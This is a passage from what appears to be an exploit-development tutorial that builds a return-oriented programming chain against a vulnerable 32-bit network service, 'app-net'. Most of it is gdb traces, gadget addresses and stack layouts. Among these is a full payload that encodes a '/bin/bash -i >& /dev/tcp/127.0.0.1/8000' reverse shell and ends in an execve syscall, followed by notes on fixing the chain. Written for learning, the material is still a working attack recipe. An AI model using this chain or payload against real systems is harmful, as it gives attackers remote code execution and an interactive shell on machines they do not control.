Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe5b0: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe5c0: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5d0: 0x41414141  0x41414141
=> 0x80748fe <strnlen+126>: pop    ebx
0x080748fe in strnlen ()
6: /x $esp = 0xbfffe5b0
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0xbfffe56c
(gdb) x/xw 0xbfffe56c
0xbfffe56c: 0xffffffff
(gdb) x/xw 0xbfffe56c + 4
0xbfffe570: 0xbbbbbbbb
(gdb) stepi
0xbfffe5b4: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe5c4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5d4: 0x41414141  0x41414141
=> 0x80748ff <strnlen+127>: pop    ebp
0x080748ff in strnlen ()
6: /x $esp = 0xbfffe5b4
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe56c
(gdb) stepi
0xbfffe5b8: 0x080c0f18  0x41414141  0x41414141  0x41414141
0xbfffe5c8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5d8: 0x41414141  0x41414141
=> 0x8074900 <strnlen+128>: ret    
0x08074900 in strnlen ()
6: /x $esp = 0xbfffe5b8
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe56c
(gdb) stepi
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5dc: 0x41414141  0x41414141
=> 0x80c0f18 <__tens+2904>: xchg   edi,eax
0x080c0f18 in __tens ()
6: /x $esp = 0xbfffe5bc
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe56c
(gdb) stepi
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5dc: 0x41414141  0x41414141
=> 0x80c0f19 <__tens+2905>: xchg   esp,eax
0x080c0f19 in __tens ()
6: /x $esp = 0xbfffe5bc
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe7cc
(gdb) stepi
0xbfffe7cc: 0x0809cd4b  0xaaaaaa66  0xeeeeeeee  0xeeeeeeee
0xbfffe7dc: 0xeeeeeeee  0x08099c0f  0x08083f21  0x08099c00
0xbfffe7ec: 0x0807629e  0x080748fc
=> 0x80c0f1a <__tens+2906>: ret    
0x080c0f1a in __tens ()
6: /x $esp = 0xbfffe7cc
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe5bc
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe7d0: 0xaaaaaa66  0xeeeeeeee  0xeeeeeeee  0xeeeeeeee
0xbfffe7e0: 0x08099c0f  0x08083f21  0x08099c00  0x0807629e
0xbfffe7f0: 0x080748fc  0xeeeeeeee
=> 0x809cd4d <____strtoull_l_internal+525>: pop    ebx
0x0809cd4d in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7d0
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7d4: 0xeeeeeeee  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe7e4: 0x08083f21  0x08099c00  0x0807629e  0x080748fc
0xbfffe7f4: 0xeeeeeeee  0xeeeeeeee
=> 0x809cd4e <____strtoull_l_internal+526>: pop    esi
0x0809cd4e in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7d4
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7d8: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x08083f21
0xbfffe7e8: 0x08099c00  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe7f8: 0xeeeeeeee  0x080c0f18
=> 0x809cd4f <____strtoull_l_internal+527>: pop    edi
0x0809cd4f in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7d8
5: /x $edi = 0xbfffe56c
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7dc: 0xeeeeeeee  0x08099c0f  0x08083f21  0x08099c00
0xbfffe7ec: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe7fc: 0x080c0f18  0x41414141
=> 0x809cd50 <____strtoull_l_internal+528>: pop    ebp
0x0809cd50 in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7dc
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7e0: 0x08099c0f  0x08083f21  0x08099c00  0x0807629e
0xbfffe7f0: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe800: 0x41414141  0x41414141
=> 0x809cd51 <____strtoull_l_internal+529>: ret    
0x0809cd51 in ____strtoull_l_internal ()
6: /x $esp = 0xbfffe7e0
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7e4: 0x08083f21  0x08099c00  0x0807629e  0x080748fc
0xbfffe7f4: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe804: 0x41414141  0x41414141
=> 0x8099c0f <strpbrk+175>: xor    eax,eax
0x08099c0f in strpbrk ()
6: /x $esp = 0xbfffe7e4
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0xbfffe5bc
(gdb) stepi
0xbfffe7e4: 0x08083f21  0x08099c00  0x0807629e  0x080748fc
0xbfffe7f4: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe804: 0x41414141  0x41414141
=> 0x8099c11 <strpbrk+177>: ret    
0x08099c11 in strpbrk ()
6: /x $esp = 0xbfffe7e4
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0x0
(gdb) x/xw 0xbfffe56c
0xbfffe56c: 0xffffffff
(gdb) stepi
0xbfffe7e8: 0x08099c00  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe7f8: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe808: 0x41414141  0x41414141
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax
0x08083f21 in _dl_get_tls_static_info ()
6: /x $esp = 0xbfffe7e8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0x0
(gdb) stepi
0xbfffe7e8: 0x08099c00  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe7f8: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe808: 0x41414141  0x41414141
=> 0x8083f23 <_dl_get_tls_static_info+19>:  ret    
0x08083f23 in _dl_get_tls_static_info ()
6: /x $esp = 0xbfffe7e8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe56c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa66
1: /x $eax = 0x0
(gdb) x/xw 0xbfffe56c
0xbfffe56c: 0x00000000

So our function seemed to have worked perfectly! :-)

Control Statements

I thought of a few different ways that control statements might be possible but was unable to find any relevant gadgets that was capable of doing it.

Because of this I haven't actually implemented any control statements in the exploit but I will describe a few gadgets that might make it possible.

The main reason I wanted a control statement in the exploit was because quite often I need to move the return value of the function into edx but the gadget to do this requires 4 double words on the stack.

As edx wasn't being used throughout the function I would have liked to find a gadget like this:

1
test edx, edx ; je esi ; ret

If we made sure edx = 0 and esi contained the address of the following gadget:

1
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret

Then we could move the return value of the function into edx within the function, shrinking the size of the payload a little more.

This allows us the run 1 gadget different depending on the value of 1 register (in this case edx).

If we could find the inverse of this contional jump, like this:

1
test edx, edx ; jne edx ; ret

In this case we still have esi spare and we just have to make sure edx is zero if we don't want to take the jump.

Of course the gadget pointed to by esi/edx (or any unused register which a gadget could jump to) could be something similar to the following:

1
xchg [reg], esp ; ret

Now, instead of just running 1 gadget, we are able to change the control flow of the application in a much bigger way.

Of course these examples are just dealing with testing if a value is zero or not but there is no reason why we could check for a number of different values with a gadget like the following:

1
test edx, esi ; je eax ; ret

We could place a number of these to test for a number of specific values or even a range using 2 gadgets similar to the following:

1
2
test edx, esi ; jg eax ; ret
test edx, ebx ; jl eax ; ret

Obviously there are so many different combinations that could lead to different branches being taken depending on certain values, these values don't necessarily need to be values set by the programmer either.

Consider the following:

1
test dword ptr [edx], esi ; je eax ; ret

Or the following sequence:

1
2
mov edx, dword ptr [edx] ; ret
test edx, esi ; je eax ; ret

Now we can test values in memory against specific values and make decisions based on that.

Another option would be with conditional move's, like this:

1
2
test edx, edx ; ret
cmove esp, eax ; ret

The goal here isn't to give you all of the possibilities that might arise, I don't think that would even be possible (there are so many possibiities), but to show that using a bit of creativity and having the right gadgets you can create reasonably complex applications using ROP.

Obviously you are limited by the gadgets that are avaliable to you though.

A Second Function

I decided to add a second function which would take 3 arguments, the same 2 as the first function but with the extra value inside edx, this would be a value to write to the address that is being calculated.

The resulting function was:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08062158 : mov dword ptr [eax], edx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

I decided that it would be best if this function could be run almost directly after the first function, so that in cases where we want to write the address of a string into a pointer to that string, the first function could be run to calculate the address of the string and then the second function could be run to write that value into the pointer.

This of course means that it would be best if the return value of the first function was put inside edx, so the first function needs to be edited.

Here is the new first function:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0804cedd : mov eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807b086 : xchg eax, esp ; ret

Now we could run the first function as normal, followed by a pop ebx and the relevant value and immediately run the second function, whose address will already be in eax to write the value we've just calculated.

Running The Second Function Directly

Obviously to write the nulls we want to just run the second function with 0 in edx.

To do this all we have to do is make sure eax contains the distance from ecx (the top of the first function) to the top of the second function, which is 108 bytes, before we add eax, ecx.

I will use a technique I've not used before to do this. First we have to run the vulnerable application:

1
appuser@dev:~$ ./app-net

Now, in another terminal (as root) we need to find out the pid of the application:

1
2
3
root@dev:~# ps ax | grep app-net
25675 pts/2    S+     0:00 ./app-net
25681 pts/1    S+     0:00 grep app-net

So our application has the pid 25675, we now need to look at the memory layout of it, this is so we know the memory address range that we need to search:

1
2
3
4
5
6
7
root@dev:~# cat /proc/25675/maps
08048000-080ca000 r-xp 00000000 08:01 964756     /home/appuser/app-net
080ca000-080cc000 rw-p 00081000 08:01 964756     /home/appuser/app-net
080cc000-080cd000 rw-p 00000000 00:00 0 
09f57000-09f79000 rw-p 00000000 00:00 0          [heap]
b771e000-b771f000 r-xp 00000000 00:00 0          [vdso]
bfabd000-bfade000 rw-p 00000000 00:00 0          [stack]

The top 2 memory segments are static, so we can use anything in these sections of memory, we will look for 108 here using gdb:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
root@dev:~# gdb -q -p 25675
Attaching to process 25675
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
0x0805790c in accept ()
(gdb) find 0x08048000, 0x080ca000, 0x0000006c
0x8056f39 <openlog_internal+217>
0x807a9d8 <fork+120>
0x807a9e5 <fork+133>
0x807aa3d <fork+221>
0x807ab00 <fork+416>
0x807abc3 <getpid+3>
0x8085c47 <raise+7>
0x80ae185 <__PRETTY_FUNCTION__.11707+37>
0x80ae2bf <__PRETTY_FUNCTION__.9288+31>
0x80ae300 <__PRETTY_FUNCTION__.9058+32>
0x80b0090 <_nl_C_LC_CTYPE_tolower+816>
0x80b0110 <_nl_C_LC_CTYPE_tolower+944>
0x80b0c78 <translit_from_idx+216>
0x80b6224 <translit_to_tbl+420>
0x80b6608 <translit_to_tbl+1416>
0x80b6a90 <translit_to_tbl+2576>
0x80b7434 <translit_to_tbl+5044>
0x80b7844 <translit_to_tbl+6084>
0x80b7e20 <translit_to_tbl+7584>
0x80b7e38 <translit_to_tbl+7608>
0x80b7f08 <translit_to_tbl+7816>
0x80b7f18 <translit_to_tbl+7832>
0x80b7f28 <translit_to_tbl+7848>
0x80b7f38 <translit_to_tbl+7864>
0x80b8320 <translit_to_tbl+8864>
0x80b8330 <translit_to_tbl+8880>
0x80b8340 <translit_to_tbl+8896>
0x80b8354 <translit_to_tbl+8916>
0x80b837c <translit_to_tbl+8956>
0x80b8390 <translit_to_tbl+8976>
0x80b843c <translit_to_tbl+9148>
0x80b8464 <translit_to_tbl+9188>
0x80b89c4 <translit_to_tbl+10564>
0x80b8c64 <translit_to_tbl+11236>
0x80b8ec8 <translit_to_tbl+11848>
0x80b9138 <translit_to_tbl+12472>
0x80b9588 <translit_to_tbl+13576>
0x80b97bc <translit_to_tbl+14140>
0x80b99d8 <translit_to_tbl+14680>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/xw 0x8056f39
0x8056f39 <openlog_internal+217>:   0x0000006c

So we can get the required value into eax using the following:

1
2
3
4
5
6
0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
[0xaaaaaaaa - distance from ecx to address that we want to write zeros]

But we still need 0 in edx, so far we've only used 1 method to do this (xor eax, eax and then moving eax to edx) but we are no longer able to use eax so we are going to have to use a different method, here is 1:

1
2
3
4
0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value

Here we are just setting edx to 0xffffffff, which is the maximum value that edx can contain, and then increasing it by 1, which will cause the carry flag to set and edx to contain 0.

Now we just need to call the function as normal:

1
2
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret

So now in 12 double words, or 48 bytes, we have written zeros to a part of memory (the functions are contained in our padding section which is of fixed size anyway).

The Exploit So Far

If we put everything we've worked out so far together, we get to a point where we've written all of the zeros (or null terminators).

Our notes should now look similar to this:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

#################### Function 1 ######################

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a3f72 : xchg eax, edi ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0804cedd : mov eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807b086 : xchg eax, esp ; ret

#################### Function 2 ######################

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08062158 : mov dword ptr [eax], edx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

################### Padding A's ####################

A * (532 - len(payload))

################### Application ####################

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x08057b7e : pop ebx ; ret
0xaaaaa8e6 : 0xaaaaaaaa - 452 (distance to 0xffffffff value in the
       : data just before the function
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the distance from edx to 
---------------------------- 0xffffffff at the end of the data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xaaaaaa96 : 0xaaaaaaaa - distance from ecx to long arg 0xffffffff (20)
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the address of 0xffffffff
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
---------------------------- write nulls over 0xffffffff
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
---------------------------- ecx now contains the starting address
---------------------------- of the function
0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
0xaaaaaa96 : distance from ecx to 3rd arg null terminator
0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
---------------------------- write nulls to 3rd arg null terminator
0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
0xaaaaaa66 : distance from ecx to -c arg null terminator
0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
---------------------------- write nulls to -c arg null terminator
0x08057b56 : pop edx ; ret
0x08056f39 : address that points to 108
0x080a8fe0 : mov eax, dword ptr [edx] ; add esp, 8 ; pop ebx ; ret
0xeeeeeeee
0xeeeeeeee : junk values
0xaaaaaa5e : distance from ecx to 1st arg null terminator
0x08057b56 : pop edx ; ret
0xffffffff : max value in edx
0x0804f594 : inc edx ; clc ; pop ebp ; ret
0xeeeeeeee : junk value
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
---------------------------- write nulls to 1st arg null terminator

Now we have to write the pointer values, we can do this by first running the first function to figure out the address of the string, then running the second function to write that value to the correct place.

Let me demonstrate how to do this with the pointer to the first string (which currently contains 0xbbbbbbbb).

First we find the address of the string:

1
2
3
4
5
0x08057b7e : pop ebx ; ret
0xaaaaaa52 : distance from ecx to the start of ////bin/bash
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret

Now we should have the address of the ////bin/bash string in edx.

Now we can write it to the correct location:

1
2
3
0x08057b7e : pop ebx ; ret
0xaaaaaa9a : distance from ecx to the ////bin/bash pointer
0x0807b086 : xchg eax, esp ; ret

Done :-)

So in 8 double words, or 32 bytes, we've calculated the address of the string, and address of the pointer and written the address of the string over the pointer.

Finalizing The Exploit

We will actually set this pointer last out of the 3 pointers because we will need to set edx and ecx afterwards.

Remember edx needs to point to nulls and ecx needs to point to the beginning on the pointers (the address we wrote to here, which will be contained in edi after running the second function).

But to set ecx the address needs to contain nulls so after running the previous sequence, we can set both ecx and edx to the correct values using these gadgets:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
0x080a3f72 : xchg eax, edi ; ret
0x080a8466 : dec eax ; ret
0x080a8466 : dec eax ; ret
0x080a8466 : dec eax ; ret
0x080a8466 : dec eax ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret

Now the value we want in ebx is at the address pointed to by ecx so the following will give us the right value inside ebx:

1
2
3
4
5
6
7
0x080838e8 : mov eax, dword ptr [ecx] ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop

Lastly we set eax and initiate the syscall:

1
2
3
4
0x080a8576 : pop eax ; ret
0x81fffff4 : (0x81ffffe9 + 11) 11 = execve syscall number
0x080aa1cc : sub eax, 0x81ffffe9 ; ret
0x08048c0d : int 0x80

Some of you may have noticed the mistake but after building the exploit and running it you will see this fails with a segfault and we get no shell.

Fixing The Exploit

I left this in here because it demonstrates nicely the types of problems you are likely to run into when developing these exploits.

The problem was in the functions, with our previous exploit the gadgets were all run in sequence so it didn't matter if we overwrote previous gadget on the stack as we weren't going to use it again.

In regards to the functions though we are going to run them numberous times so we must ensure that nothing that is vital for the application it overwritten.

The offending gadget (present in both functions) is:

1
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret

The problem here is that the first push eax will actually overwrite the gadget itself on the stack.

Let's visualize this a little, just before the above gadget is run, the top of the stack looks like this:

When the gadget is first run, esp changes value by 4 bytes, like this:

Now the push eax instruction is executed which causes this to happen:

Obviously this is undesirable because when we go to run the function again instead of running the actual gadget it will try to change execution to the value that was put here in the gadgets place.

The only way to deal with this is by removing this gadget and replacing it with something that doesn't edit any important parts of the stack.

One way I am going to solve this is by returning to the main application and moving the value into ebx there, this will however increase the size of the payload.

The second function is easiest to change:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret
0x080a3f72 : xchg eax, edi ; ret
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08062158 : mov dword ptr [eax], edx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

On line 7 execution is moved back to the main application, there we must move the value, which will be in the edi register, into ebx.

The first function is a bit more difficult because there are 2 instances of the offending gadget.

The first we can deal with the same as in the second function but the second instance is different.

The goal of the end of this function is to move the return value into edx so that the second function can be run directly after.

What we can do is move the value into edi and then xchg edx and edi using the following 2 gadgets:

1
2
0x080a3f72 : xchg eax, edi ; ret
0x080ab696 : xchg edx, edi ; inc dword ptr [ebx + 0x5e5b04c4] ; pop ebp ; ret

There is 1 problem here, the inc instruction after the xchg.

We need to make sure that this (ebx + 0x5e5b04c4) adds up to a memory address that is writable.

After looking at the application memory map over a few runs of the application:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
root@dev:/home/testuser# cat /proc/32019/maps
08048000-080ca000 r-xp 00000000 08:01 964756     /home/appuser/app-net
080ca000-080cc000 rw-p 00081000 08:01 964756     /home/appuser/app-net
080cc000-080cd000 rw-p 00000000 00:00 0 
08ba6000-08bc8000 rw-p 00000000 00:00 0          [heap]
b77bb000-b77bc000 r-xp 00000000 00:00 0          [vdso]
bf7ed000-bf80e000 rw-p 00000000 00:00 0          [stack]
root@dev:/home/testuser# cat /proc/32024/maps
08048000-080ca000 r-xp 00000000 08:01 964756     /home/appuser/app-net
080ca000-080cc000 rw-p 00081000 08:01 964756     /home/appuser/app-net
080cc000-080cd000 rw-p 00000000 00:00 0 
097fd000-0981f000 rw-p 00000000 00:00 0          [heap]
b77cc000-b77cd000 r-xp 00000000 00:00 0          [vdso]
